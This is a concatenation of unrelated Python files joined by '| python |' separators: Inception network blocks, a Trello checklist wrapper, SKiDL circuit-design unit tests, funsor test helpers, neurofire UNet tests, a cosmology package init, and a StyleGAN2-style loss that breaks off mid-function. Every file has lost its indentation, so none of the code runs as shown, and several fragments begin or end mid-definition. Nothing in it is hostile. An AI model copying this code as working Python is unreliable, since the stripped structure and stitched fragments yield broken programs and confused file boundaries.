Convolution2D([1, 3], filters=256)
with parallel_inner:
Convolution2D([3, 1], filters=256)
with parallel:
Convolution1x1(filters=384)
Convolution2D([1, 3], filters=384)
Convolution2D([3, 1], filters=512)
FilterConcat()
def reduceA(n, l, k, m):
with ParallelBlock() as parallel:
with parallel:
MaxPooling2D([3, 3])
with parallel:
Convolution3x3(n)
with parallel:
Convolution1x1(filters=k)
Convolution3x3(filters=l)
Convolution3x3(filters=m)
FilterConcat()
def reduceB():
with ParallelBlock() as parallel:
with parallel:
MaxPooling2D([3, 3], stride=2)
with parallel:
Convolution1x1(192)
Convolution3x3(192)
with parallel:
Convolution1x1(filters=256)
Convolution2D([1, 7], filters=256)
Convolution2D([7, 1], filters=320)
Convolution3x3(filters=320, stride=2)
FilterConcat()
def inceptionResnetA():
RectifiedLinearUnit()
with ParallelBlock() as parallel:
with parallel:
with ParallelBlock() as parallel_inner:
with parallel_inner:
Convolution1x1(32)
with parallel_inner:
Convolution1x1(32)
Convolution3x3(32)
with parallel_inner:
Convolution1x1(32)
Convolution3x3(32)
Convolution3x3(32)
Convolution1x1(filters=256)
Sum()
def inceptionResnetB():
RectifiedLinearUnit()
with ParallelBlock() as parallel:
with parallel:
with ParallelBlock() as parallel_inner:
with parallel_inner:
Convolution1x1(128)
with parallel_inner:
Convolution1x1(128)
Convolution2D([1, 7], filters=128)
Convolution2D([7, 1], filters=128)
Convolution1x1(filters=896)
Sum()
| python |
# -*- coding: utf-8 -*-
import trello.checklist as checklist
class Checklist(checklist.Checklist):
pass
| python |
import os
import unittest
from skidl import *
class UnitTestsElectronicDesignAutomationSkidlExamples(unittest.TestCase):
def test_introduction(self):
print("test_introduction")
# Create input & output voltages and ground reference.
vin, vout, gnd = Net('VI'), Net('VO'), Net('GND')
# Create two resistors.
r1, r2 = 2 * Part("Device", 'R', TEMPLATE, footprint='Resistor_SMD.pretty:R_0805_2012Metric')
r1.value = '1K' # Set upper resistor value.
r2.value = '500' # Set lower resistor value.
# Connect the nets and resistors.
vin += r1[1] # Connect the input to the upper resistor.
gnd += r2[2] # Connect the lower resistor to ground.
vout += r1[2], r2[1] # Output comes from the connection of the two resistors.
# Or you could do it with a single line of code:
# vin && r1 && vout && r2 && gnd
# Output the netlist to a file.
generate_netlist()
def test_finding_parts(self):
print("test_finding_parts")
with open("finding_parts.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('opamp') \n")
file.write("search('^lm386$') \n")
file.write("search('opamp low-noise dip-8') \n")
file.write("search('opamp (low-noise|dip-8)') \n")
file.write("search('opamp " + '"' + "high performance" + '"' + "') \n")
file.write("show('Amplifier_Audio', 'lm386') \n")
file.write("show('Amplifier_Audio', 'lm38') \n")
file.write("search_footprints('QFN-48') \n")
os.system("python finding_parts.py")
def test_instantiating_parts(self):
print("test_instantiating_parts")
with open('instantiating_parts.py', 'w') as file:
file.write("from skidl import * \n\n")
file.write("resistor = Part('Device','R') \n")
file.write("resistor.value = '1K' \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("resistor = Part('Device','R', value='2K') \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
file.write("resistor.ref = 'R5' \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
file.write("another_res = Part('Device','R') \n")
file.write("print('another_res.ref : ' + another_res.ref) \n")
file.write("resistor.ref = 'R1' \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
os.system("python instantiating_parts.py")
def test_connecting_pins(self):
print("test_connecting_pins")
with open('connecting_pins.py', 'w') as file:
file.write("from skidl import * \n\n")
file.write("rup = Part('Device', 'R', value='1K', footprint='Resistor_SMD.pretty:R_0805_2012Metric') \n")
file.write("rlow = Part('Device', 'R', value='500', footprint='Resistor_SMD.pretty:R_0805_2012Metric') \n")
file.write("print('rup.ref : ' + rup.ref) \n")
file.write("print('rlow.ref : ' + rlow.ref) \n")
file.write("print('rup.value : ' + rup.value) \n")
file.write("print('rlow.value : ' + rlow.value) \n")
file.write("v_in = Net('VIN') \n")
file.write("print('v_in.name : ' + str(v_in.name)) \n")
file.write("rup[1] += v_in \n")
file.write("print('rup[1].net : ' + str(rup[1].net)) \n")
file.write("gnd = Net('GND') \n")
file.write("rlow[1] += gnd \n")
file.write("print('rlow[1].net : ' + str(rlow[1].net)) \n")
file.write("v_out = Net('VO') \n")
file.write("v_out += rup[2], rlow[2] \n")
file.write("print('rup[2].net : ' + str(rup[2].net)) \n")
file.write("print('rlow[2].net : ' + str(rlow[2].net)) \n")
file.write("rup[2] += rlow[2] \n")
file.write("v_out = Net('VO') \n")
file.write("v_out += rlow[2] \n")
file.write("print('rup[2].net : ' + str(rup[2].net)) \n")
file.write("print('rlow[2].net : ' + str(rlow[2].net)) \n")
file.write("ERC() \n")
file.write("v_in.do_erc = False \n")
file.write("gnd.do_erc = False \n")
file.write("ERC() \n")
file.write("generate_netlist() \n")
file.write("generate_xml() \n")
os.system("python connecting_pins.py")
def test_searching_transistor_npn(self):
print("test_searching_transistor_npn")
with open("searching_transistor_npn.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('transistor (npn)') \n")
os.system("python searching_transistor_npn.py")
def test_searching_bridge_rectifier(self):
print("test_searching_bridge_rectifier")
with open("test_searching_bridge_rectifier.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('bridge rectifier') \n")
os.system("python test_searching_bridge_rectifier.py")
def test_searching_optocoupler(self):
print("test_searching_optocoupler")
with open("test_searching_optocoupler.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('optocoupler') \n")
os.system("python test_searching_optocoupler.py")
def test_searching_resistor(self):
print("test_searching_resistor")
with open("test_searching_resistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('resistor') \n")
os.system("python test_searching_resistor.py")
def test_searching_terminal_block(self):
print("test_searching_terminal_block")
with open("test_searching_terminal_block.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('analog') \n")
os.system("python test_searching_terminal_block.py")
def test_searching_footprint(self):
print("test_searching_footprint")
with open("test_searching_footprint.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('footprint') \n")
os.system("python test_searching_footprint.py")
def test_searching_footprints_of_one_resistor(self):
print("test_searching_footprints_of_one_resistor")
with open("test_searching_footprints_of_one_resistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search_footprints('R') \n")
os.system("python test_searching_footprints_of_one_resistor.py")
def test_searching_footprints_of_one_transistor(self):
print("test_searching_footprints_of_one_transistor")
with open("test_searching_footprints_of_one_transistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search_footprints('transistor') \n")
os.system("python test_searching_footprints_of_one_transistor.py")
def test_searching_footprints_of_one_optocoupler(self):
print("test_searching_footprints_of_one_optocoupler")
with open("test_searching_footprints_of_one_optocoupler.py", "w") as file:
file.write("from skidl import * \n\n")
# file.write("search_footprints('optocoupler') \n")
file.write("search_footprints('Relay_SolidState') \n")
os.system("python test_searching_footprints_of_one_optocoupler.py")
def test_searching_footprints_of_one_diode_bridge_rectifier(self):
print("test_searching_footprints_of_one_diode_bridge_rectifier")
with open("test_searching_footprints_of_one_diode_bridge_rectifier.py", "w") as file:
file.write("from skidl import * \n\n")
# file.write("search_footprints('bridge rectifier') \n")
# file.write("search_footprints('GUO40-08NO1') \n")
file.write("search_footprints('Diode_Bridge') \n")
os.system("python test_searching_footprints_of_one_diode_bridge_rectifier.py")
if __name__ == '__main__':
unittest.main()
| python |
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import contextlib
import importlib
import itertools
import numbers
import operator
from collections import OrderedDict, namedtuple
from functools import reduce
import numpy as np
import opt_einsum
from multipledispatch import dispatch
from multipledispatch.variadic import Variadic
import funsor.ops as ops
from funsor.cnf import Contraction
from funsor.delta import Delta
from funsor.domains import Bint, Domain, Real
from funsor.gaussian import Gaussian
from funsor.tensor import Tensor
from funsor.terms import Funsor, Number
from funsor.util import get_backend
@contextlib.contextmanager
def xfail_if_not_implemented(msg="Not implemented", *, match=None):
try:
yield
except NotImplementedError as e:
if match is not None and match not in str(e):
raise e from None
import pytest
pytest.xfail(reason="{}:\n{}".format(msg, e))
@contextlib.contextmanager
def xfail_if_not_found(msg="Not implemented"):
try:
yield
except AttributeError as e:
import pytest
pytest.xfail(reason="{}:\n{}".format(msg, e))
def requires_backend(*backends, reason=None):
import pytest
if reason is None:
reason = "Test requires backend {}".format(" or ".join(backends))
return pytest.mark.skipif(get_backend() not in backends, reason=reason)
def excludes_backend(*backends, reason=None):
import pytest
if reason is None:
reason = "Test excludes backend {}".format(" and ".join(backends))
return pytest.mark.skipif(get_backend() in backends, reason=reason)
class ActualExpected(namedtuple("LazyComparison", ["actual", "expected"])):
"""
Lazy string formatter for test assertions.
"""
def __repr__(self):
return "\n".join(["Expected:", str(self.expected), "Actual:", str(self.actual)])
def id_from_inputs(inputs):
if isinstance(inputs, (dict, OrderedDict)):
inputs = inputs.items()
if not inputs:
return "()"
return ",".join(k + "".join(map(str, d.shape)) for k, d in inputs)
@dispatch(object, object, Variadic[float])
def allclose(a, b, rtol=1e-05, atol=1e-08):
if type(a) != type(b):
return False
return ops.abs(a - b) < rtol + atol * ops.abs(b)
dispatch(np.ndarray, np.ndarray, Variadic[float])(np.allclose)
@dispatch(Tensor, Tensor, Variadic[float])
def allclose(a, b, rtol=1e-05, atol=1e-08):
if a.inputs != b.inputs or a.output != b.output:
return False
return allclose(a.data, b.data, rtol=rtol, atol=atol)
def is_array(x):
if isinstance(x, Funsor):
return False
if get_backend() == "torch":
return False
return ops.is_numeric_array(x)
def assert_close(actual, expected, atol=1e-6, rtol=1e-6):
msg = ActualExpected(actual, expected)
if is_array(actual):
assert is_array(expected), msg
elif isinstance(actual, Tensor) and is_array(actual.data):
assert isinstance(expected, Tensor) and is_array(expected.data), msg
elif (
isinstance(actual, Contraction)
and isinstance(actual.terms[0], Tensor)
and is_array(actual.terms[0].data)
):
assert isinstance(expected, Contraction) and is_array(
expected.terms[0].data
), msg
elif isinstance(actual, Contraction) and isinstance(actual.terms[0], Delta):
assert isinstance(expected, Contraction) and isinstance(
expected.terms[0], Delta
), msg
elif isinstance(actual, Gaussian):
assert isinstance(expected, Gaussian)
else:
assert type(actual) == type(expected), msg
if isinstance(actual, Funsor):
assert isinstance(expected, Funsor), msg
assert actual.inputs == expected.inputs, (actual.inputs, expected.inputs)
assert actual.output == expected.output, (actual.output, expected.output)
if isinstance(actual, (Number, Tensor)):
assert_close(actual.data, expected.data, atol=atol, rtol=rtol)
elif isinstance(actual, Delta):
assert frozenset(n for n, p in actual.terms) == frozenset(
n for n, p in expected.terms
)
actual = actual.align(tuple(n for n, p in expected.terms))
for (actual_name, (actual_point, actual_log_density)), (
expected_name,
(expected_point, expected_log_density),
) in zip(actual.terms, expected.terms):
assert actual_name == expected_name
assert_close(actual_point, expected_point, atol=atol, rtol=rtol)
assert_close(actual_log_density, expected_log_density, atol=atol, rtol=rtol)
elif isinstance(actual, Gaussian):
# Note white_vec and prec_sqrt are expected to agree only up to an
# orthogonal factor, but precision and info_vec should agree exactly.
assert_close(actual._info_vec, expected._info_vec, atol=atol, rtol=rtol)
assert_close(actual._precision, expected._precision, atol=atol, rtol=rtol)
elif isinstance(actual, Contraction):
assert actual.red_op == expected.red_op
assert actual.bin_op == expected.bin_op
assert actual.reduced_vars == expected.reduced_vars
assert len(actual.terms) == len(expected.terms)
for ta, te in zip(actual.terms, expected.terms):
assert_close(ta, te, atol, rtol)
elif type(actual).__name__ == "Tensor":
assert get_backend() == "torch"
import torch
assert actual.dtype == expected.dtype, msg
assert actual.shape == expected.shape, msg
if actual.dtype in (torch.long, torch.uint8, torch.bool):
assert (actual == expected).all(), msg
else:
eq = actual == expected
if eq.all():
return
if eq.any():
actual = actual[~eq]
expected = expected[~eq]
diff = (actual.detach() - expected.detach()).abs()
if rtol is not None:
assert (diff / (atol + expected.detach().abs())).max() < rtol, msg
elif atol is not None:
assert diff.max() < atol, msg
elif is_array(actual):
if get_backend() == "jax":
import jax
assert jax.numpy.result_type(actual.dtype) == jax.numpy.result_type(
expected.dtype
), msg
else:
assert actual.dtype == expected.dtype, msg
assert actual.shape == expected.shape, msg
if actual.dtype in (np.int32, np.int64, np.uint8, bool):
assert (actual == expected).all(), msg
else:
actual, expected = np.asarray(actual), np.asarray(expected)
eq = actual == expected
if eq.all():
return
if eq.any():
actual = actual[~eq]
expected = expected[~eq]
diff = abs(actual - expected)
if rtol is not None:
assert (diff / (atol + abs(expected))).max() < rtol, msg
elif atol is not None:
assert diff.max() < atol, msg
elif isinstance(actual, numbers.Number):
diff = abs(actual - expected)
if rtol is not None:
assert diff < (atol + abs(expected)) * rtol, msg
elif atol is not None:
assert diff < atol, msg
elif isinstance(actual, dict):
assert isinstance(expected, dict)
assert set(actual) == set(expected)
for k, actual_v in actual.items():
assert_close(actual_v, expected[k], atol=atol, rtol=rtol)
elif isinstance(actual, tuple):
assert isinstance(expected, tuple)
assert len(actual) == len(expected)
for actual_v, expected_v in zip(actual, expected):
assert_close(actual_v, expected_v, atol=atol, rtol=rtol)
else:
raise ValueError("cannot compare objects of type {}".format(type(actual)))
def check_funsor(x, inputs, output, data=None):
"""
Check dims and shape modulo reordering.
"""
assert isinstance(x, Funsor)
assert dict(x.inputs) == dict(inputs)
if output is not None:
assert x.output == output
if data is not None:
if x.inputs == inputs:
x_data = x.data
else:
x_data = x.align(tuple(inputs)).data
if inputs or output.shape:
assert (x_data == data).all()
else:
assert x_data == data
def xfail_param(*args, **kwargs):
import pytest
return pytest.param(*args, marks=[pytest.mark.xfail(**kwargs)])
def make_einsum_example(equation, fill=None, sizes=(2, 3)):
symbols = sorted(set(equation) - set(",->"))
sizes = {dim: size for dim, size in zip(symbols, itertools.cycle(sizes))}
inputs, outputs = equation.split("->")
inputs = inputs.split(",")
outputs = outputs.split(",")
operands = []
for dims in inputs:
shape = tuple(sizes[dim] for dim in dims)
x = randn(shape)
operand = x if fill is None else (x - x + fill)
# no need to use pyro_dims for numpy backend
if not isinstance(operand, np.ndarray):
operand._pyro_dims = dims
operands.append(operand)
funsor_operands = [
Tensor(operand, OrderedDict([(d, Bint[sizes[d]]) for d in inp]))
for inp, operand in zip(inputs, operands)
]
assert equation == ",".join(
["".join(operand.inputs.keys()) for operand in funsor_operands]
) + "->" + ",".join(outputs)
return inputs, outputs, sizes, operands, funsor_operands
def assert_equiv(x, y):
"""
Check that two funsors are equivalent up to permutation of inputs.
"""
check_funsor(x, y.inputs, y.output, y.data)
def rand(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.rand(shape)
else:
# work around numpy random returns float object instead of np.ndarray object when shape == ()
return np.array(np.random.rand(*shape))
def randint(low, high, size):
backend = get_backend()
if backend == "torch":
import torch
return torch.randint(low, high, size=size)
else:
return np.random.randint(low, high, size=size)
def randn(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.randn(shape)
else:
# work around numpy random returns float object instead of np.ndarray object when shape == ()
return np.array(np.random.randn(*shape))
def random_scale_tril(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
from funsor.distribution import BACKEND_TO_DISTRIBUTIONS_BACKEND
backend_dist = importlib.import_module(
BACKEND_TO_DISTRIBUTIONS_BACKEND[get_backend()]
).dist
if get_backend() == "torch":
data = randn(shape)
return backend_dist.transforms.transform_to(
backend_dist.constraints.lower_cholesky
)(data)
else:
data = randn(shape[:-2] + (shape[-1] * (shape[-1] + 1) // 2,))
return backend_dist.biject_to(backend_dist.constraints.lower_cholesky)(data)
def zeros(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.zeros(shape)
else:
return np.zeros(shape)
def ones(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.ones(shape)
else:
return np.ones(shape)
def empty(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.empty(shape)
else:
return np.empty(shape)
def random_tensor(inputs, output=Real):
"""
Creates a random :class:`funsor.tensor.Tensor` with given inputs and output.
"""
backend = get_backend()
assert isinstance(inputs, OrderedDict)
assert isinstance(output, Domain)
shape = tuple(d.dtype for d in inputs.values()) + output.shape
if output.dtype == "real":
data = randn(shape)
else:
num_elements = reduce(operator.mul, shape, 1)
if backend == "torch":
import torch
data = torch.multinomial(
torch.ones(output.dtype), num_elements, replacement=True
)
else:
data = np.random.choice(output.dtype, num_elements, replace=True)
data = data.reshape(shape)
return Tensor(data, inputs, output.dtype)
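# Illustrative example (hypothetical inputs): random_tensor(OrderedDict(i=Bint[3]), Real)
# draws data of shape (3,) with randn and returns a Tensor with one batch input "i" of size 3
# and a real-valued output.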
def random_gaussian(inputs):
"""
Creates a random :class:`funsor.gaussian.Gaussian` with given inputs.
"""
assert isinstance(inputs, OrderedDict)
batch_shape = tuple(d.dtype for d in inputs.values() if d.dtype != "real")
event_shape = (sum(d.num_elements for d in inputs.values() if d.dtype == "real"),)
prec_sqrt = randn(batch_shape + event_shape + event_shape)
precision = ops.matmul(prec_sqrt, ops.transpose(prec_sqrt, -1, -2))
precision = precision + 0.5 * ops.new_eye(precision, event_shape[:1])
prec_sqrt = ops.cholesky(precision)
loc = randn(batch_shape + event_shape)
white_vec = ops.matmul(prec_sqrt, ops.unsqueeze(loc, -1)).squeeze(-1)
return Gaussian(white_vec=white_vec, prec_sqrt=prec_sqrt, inputs=inputs)
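# Illustrative example (hypothetical inputs): for OrderedDict(i=Bint[3], x=Real),
# batch_shape is (3,) and event_shape is (1,), so prec_sqrt has shape (3, 1, 1) and
# white_vec has shape (3, 1); the 0.5 * I term above keeps the precision matrix safely
# positive definite before the Cholesky factorization.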
def random_mvn(batch_shape, dim, diag=False):
"""
Generate a random :class:`torch.distributions.MultivariateNormal` with given shape.
"""
backend = get_backend()
rank = dim + dim
loc = randn(batch_shape + (dim,))
cov = randn(batch_shape + (dim, rank))
cov = cov @ ops.transpose(cov, -1, -2)
if diag:
cov = cov * ops.new_eye(cov, (dim,))
if backend == "torch":
import pyro
return pyro.distributions.MultivariateNormal(loc, cov)
elif backend == "jax":
import numpyro
return numpyro.distributions.MultivariateNormal(loc, cov)
def make_plated_hmm_einsum(num_steps, num_obs_plates=1, num_hidden_plates=0):
assert num_obs_plates >= num_hidden_plates
t0 = num_obs_plates + 1
obs_plates = "".join(opt_einsum.get_symbol(i) for i in range(num_obs_plates))
hidden_plates = "".join(opt_einsum.get_symbol(i) for i in range(num_hidden_plates))
inputs = [str(opt_einsum.get_symbol(t0))]
for t in range(t0, num_steps + t0):
inputs.append(
str(opt_einsum.get_symbol(t))
+ str(opt_einsum.get_symbol(t + 1))
+ hidden_plates
)
inputs.append(str(opt_einsum.get_symbol(t + 1)) + obs_plates)
equation = ",".join(inputs) + "->"
return (equation, "".join(sorted(tuple(set(obs_plates + hidden_plates)))))
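# Illustrative example: make_plated_hmm_einsum(2, num_obs_plates=1, num_hidden_plates=0)
# returns ("c,cd,da,de,ea->", "a"): an initial factor, per-step transition factors,
# and observation factors carrying the plate symbol "a".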
def make_chain_einsum(num_steps):
inputs = [str(opt_einsum.get_symbol(0))]
for t in range(num_steps):
inputs.append(str(opt_einsum.get_symbol(t)) + str(opt_einsum.get_symbol(t + 1)))
equation = ",".join(inputs) + "->"
return equation
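# Illustrative example: make_chain_einsum(2) returns "a,ab,bc->".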
def make_hmm_einsum(num_steps):
inputs = [str(opt_einsum.get_symbol(0))]
for t in range(num_steps):
inputs.append(str(opt_einsum.get_symbol(t)) + str(opt_einsum.get_symbol(t + 1)))
inputs.append(str(opt_einsum.get_symbol(t + 1)))
equation = ",".join(inputs) + "->"
return equation
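# Illustrative example: make_hmm_einsum(2) returns "a,ab,b,bc,c->",
# interleaving transition ("ab", "bc") and emission ("b", "c") factors.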
def iter_subsets(iterable, *, min_size=None, max_size=None):
if min_size is None:
min_size = 0
if max_size is None:
max_size = len(iterable)
for size in range(min_size, max_size + 1):
yield from itertools.combinations(iterable, size)
class DesugarGetitem:
"""
Helper to desugar ``.__getitem__()`` syntax.
Example::
>>> desugar_getitem[1:3, ..., None]
(slice(1, 3), Ellipsis, None)
"""
def __getitem__(self, index):
return index
desugar_getitem = DesugarGetitem()
| python |
import unittest
import torch.cuda as cuda
from inferno.utils.model_utils import MultiscaleModelTester
class TestUnetMultiscale(unittest.TestCase):
def test_unet_multiscale_2d(self):
from neurofire.models import UNet2DMultiscale
input_shape = (1, 1, 512, 512)
output_shape = ((1, 1, 512, 512),
(1, 1, 256, 256),
(1, 1, 128, 128),
(1, 1, 64, 64))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
tester(UNet2DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3))
# this may fail on travis due to insufficient ram
@unittest.expectedFailure
def test_unet_multiscale_3d(self):
from neurofire.models import UNet3DMultiscale
input_shape = (1, 1, 32, 128, 128)
output_shape = ((1, 1, 32, 128, 128),
(1, 1, 16, 64, 64),
(1, 1, 8, 32, 32),
(1, 1, 4, 16, 16))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
# test default unet 3d
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=2))
# test with residual block
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=2,
add_residual_connections=True))
# test unet 3d with anisotropic sampling
output_shape = ((1, 1, 32, 128, 128),
(1, 1, 32, 64, 64),
(1, 1, 32, 32, 32),
(1, 1, 32, 16, 16))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=[(1, 2, 2),
(1, 2, 2),
(1, 2, 2)]))
if __name__ == '__main__':
unittest.main()
| python |
from .linear_growth_class import CosmoLinearGrowth
from .linear_growth_functions import a2z
from .linear_growth_functions import z2a
from .linear_growth_functions import get_Hz
from .linear_growth_functions import get_Dz
from .linear_growth_functions import get_r
from .linear_growth_functions import get_omega_m_z
from .linear_growth_functions import get_fz
from .linear_growth_functions import get_fz_numerical
from .linear_growth_functions import get_sigma_8
from .linear_growth_functions import get_z_array
| python |
#!/usr/bin/python
#-*- coding: utf-8 -*-
# >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.
# Licensed under the Apache License, Version 2.0 (the "License")
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# --- File Name: loss_uneven.py
# --- Creation Date: 19-04-2021
# --- Last Modified: Sat 24 Apr 2021 00:10:40 AEST
# --- Author: Xinqi Zhu
# .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<
"""
Loss for Uneven Network. Code borrowed from Nvidia StyleGAN2-ada-pytorch.
"""
import numpy as np
import torch
from torch import nn
from torch_utils import training_stats
from torch_utils import misc
from torch_utils.ops import conv2d_gradfix
from training.loss import StyleGAN2Loss
#----------------------------------------------------------------------------
class UnevenLoss(StyleGAN2Loss):
def __init__(self, device, G_mapping, G_synthesis, D, augment_pipe=None, style_mixing_prob=0.9, r1_gamma=10,
pl_batch_shrink=2, pl_decay=0.01, pl_weight=2, w1reg_lambda=0., uneven_reg_maxval=1., reg_type='linear',
plz_weight=0., plz_decay=0.01, plzsep_weight=0., plzsep_decay=0.01):
super().__init__(device, G_mapping, G_synthesis, D, augment_pipe, style_mixing_prob, r1_gamma, pl_batch_shrink, pl_decay, pl_weight)
self.w1reg_lambda = w1reg_lambda
self.uneven_reg_maxval = uneven_reg_maxval
self.reg_type = reg_type
self.plz_weight = plz_weight
self.plz_decay = plz_decay
self.plz_mean = torch.zeros([], device=device)
self.plzsep_weight = plzsep_weight
self.plzsep_decay = plzsep_decay
self.plzsep_mean = torch.linspace(0., 1., G_mapping.module.z_dim, device=device)**2
# if self.reg_type == 'cumax_ada' or self.reg_type == 'monoconst_ada':
# self.ada_logits = nn.Parameter(torch.ones(self.G_mapping.z_dim), requires_grad=True)
def get_w1reg_scale(self, w1, cur_device):
# if self.reg_type == 'cumax_ada':
# # if self.use_cumax_adaptive:
# reg_softmax = nn.functional.softmax(self.ada_logits, dim=0)
# reg = torch.cumsum(reg_softmax, dim=0) * self.uneven_reg_maxval
# elif self.reg_type == 'monoconst_ada':
# reg_softmax = nn.functional.softmax(self.ada_logits, dim=0)
# reg_cumax = torch.cumsum(reg_softmax, dim=0)
# reg = reg_cumax / torch.sum(reg_cumax, dim=0) * self.uneven_reg_maxval
if self.reg_type == 'exp':
reg = torch.linspace(0., self.uneven_reg_maxval, w1.size(1)).to(cur_device)
reg = torch.exp(reg)
else:
reg = torch.linspace(0., self.uneven_reg_maxval, w1.size(1)).to(cur_device)
return reg
def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain):
assert phase in ['Gmain', 'Greg', 'Gboth', 'Dmain', 'Dreg', 'Dboth', 'Gw1reg',
'Dw1reg', 'Gplzreg', 'Dplzreg', 'Gplzsepreg', 'Dplzsepreg']
do_Gmain = (phase in ['Gmain', 'Gboth'])
do_Dmain = (phase in ['Dmain', 'Dboth'])
do_Gpl = (phase in ['Greg', 'Gboth']) and (self.pl_weight != 0)
do_Dr1 = (phase in ['Dreg', 'Dboth']) and (self.r1_gamma != 0)
do_Gw1reg = (phase in ['Gw1reg', 'Gboth']) and (self.w1reg_lambda != 0)
do_Gplz = (phase in ['Gplzreg', 'Gboth']) and (self.plz_weight != 0)
do_Gplzsep = (phase in ['Gplzsepreg', 'Gboth']) and (self.plzsep_weight != 0)
# Gmain: Maximize logits for generated images.
if do_Gmain:
with torch.autograd.profiler.record_function('Gmain_forward'):
gen_img, _gen_ws = self.run_G(gen_z, gen_c, sync=(sync and not do_Gpl and not do_Gplz and not do_Gplzsep)) # May get synced by Gpl.
gen_logits = self.run_D(gen_img, gen_c, sync=False)
training_stats.report('Loss/scores/fake', gen_logits)
training_stats.report('Loss/signs/fake', gen_logits.sign())
loss_Gmain = torch.nn.functional.softplus(-gen_logits) # -log(sigmoid(gen_logits))
training_stats.report('Loss/G/loss', loss_Gmain)
with torch.autograd.profiler.record_function('Gmain_backward'):
loss_Gmain.mean().mul(gain).backward()
# Gpl: Apply path length regularization.
if do_Gpl:
with torch.autograd.profiler.record_function('Gpl_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_img, gen_ws = self.run_G(gen_z[:batch_size], gen_c[:batch_size], sync=sync)
pl_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('pl_grads'), conv2d_gradfix.no_weight_gradients():
pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws], create_graph=True, only_inputs=True)[0]
pl_lengths = pl_grads.square().sum(2).mean(1).sqrt()
pl_mean = self.pl_mean.lerp(pl_lengths.mean(), self.pl_decay)
self.pl_mean.copy_(pl_mean.detach())
pl_penalty = (pl_lengths - pl_mean).square()
training_stats.report('Loss/pl_penalty', pl_penalty)
loss_Gpl = pl_penalty * self.pl_weight
training_stats.report('Loss/G/reg', loss_Gpl)
with torch.autograd.profiler.record_function('Gpl_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gpl).mean().mul(gain).backward()
# Dmain: Minimize logits for generated images.
loss_Dgen = 0
if do_Dmain:
with torch.autograd.profiler.record_function('Dgen_forward'):
gen_img, _gen_ws = self.run_G(gen_z, gen_c, sync=False)
gen_logits = self.run_D(gen_img, gen_c, sync=False) # Gets synced by loss_Dreal.
training_stats.report('Loss/scores/fake', gen_logits)
training_stats.report('Loss/signs/fake', gen_logits.sign())
loss_Dgen = torch.nn.functional.softplus(gen_logits) # -log(1 - sigmoid(gen_logits))
with torch.autograd.profiler.record_function('Dgen_backward'):
loss_Dgen.mean().mul(gain).backward()
# Dmain: Maximize logits for real images.
# Dr1: Apply R1 regularization.
if do_Dmain or do_Dr1:
name = 'Dreal_Dr1' if do_Dmain and do_Dr1 else 'Dreal' if do_Dmain else 'Dr1'
with torch.autograd.profiler.record_function(name + '_forward'):
real_img_tmp = real_img.detach().requires_grad_(do_Dr1)
real_logits = self.run_D(real_img_tmp, real_c, sync=sync)
training_stats.report('Loss/scores/real', real_logits)
training_stats.report('Loss/signs/real', real_logits.sign())
loss_Dreal = 0
if do_Dmain:
loss_Dreal = torch.nn.functional.softplus(-real_logits) # -log(sigmoid(real_logits))
training_stats.report('Loss/D/loss', loss_Dgen + loss_Dreal)
loss_Dr1 = 0
if do_Dr1:
with torch.autograd.profiler.record_function('r1_grads'), conv2d_gradfix.no_weight_gradients():
r1_grads = torch.autograd.grad(outputs=[real_logits.sum()], inputs=[real_img_tmp], create_graph=True, only_inputs=True)[0]
r1_penalty = r1_grads.square().sum([1,2,3])
loss_Dr1 = r1_penalty * (self.r1_gamma / 2)
training_stats.report('Loss/r1_penalty', r1_penalty)
training_stats.report('Loss/D/reg', loss_Dr1)
with torch.autograd.profiler.record_function(name + '_backward'):
(real_logits * 0 + loss_Dreal + loss_Dr1).mean().mul(gain).backward()
# Gplz: Apply path length regularization on z.
if do_Gplz:
with torch.autograd.profiler.record_function('Gplz_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_z_used = gen_z[:batch_size]
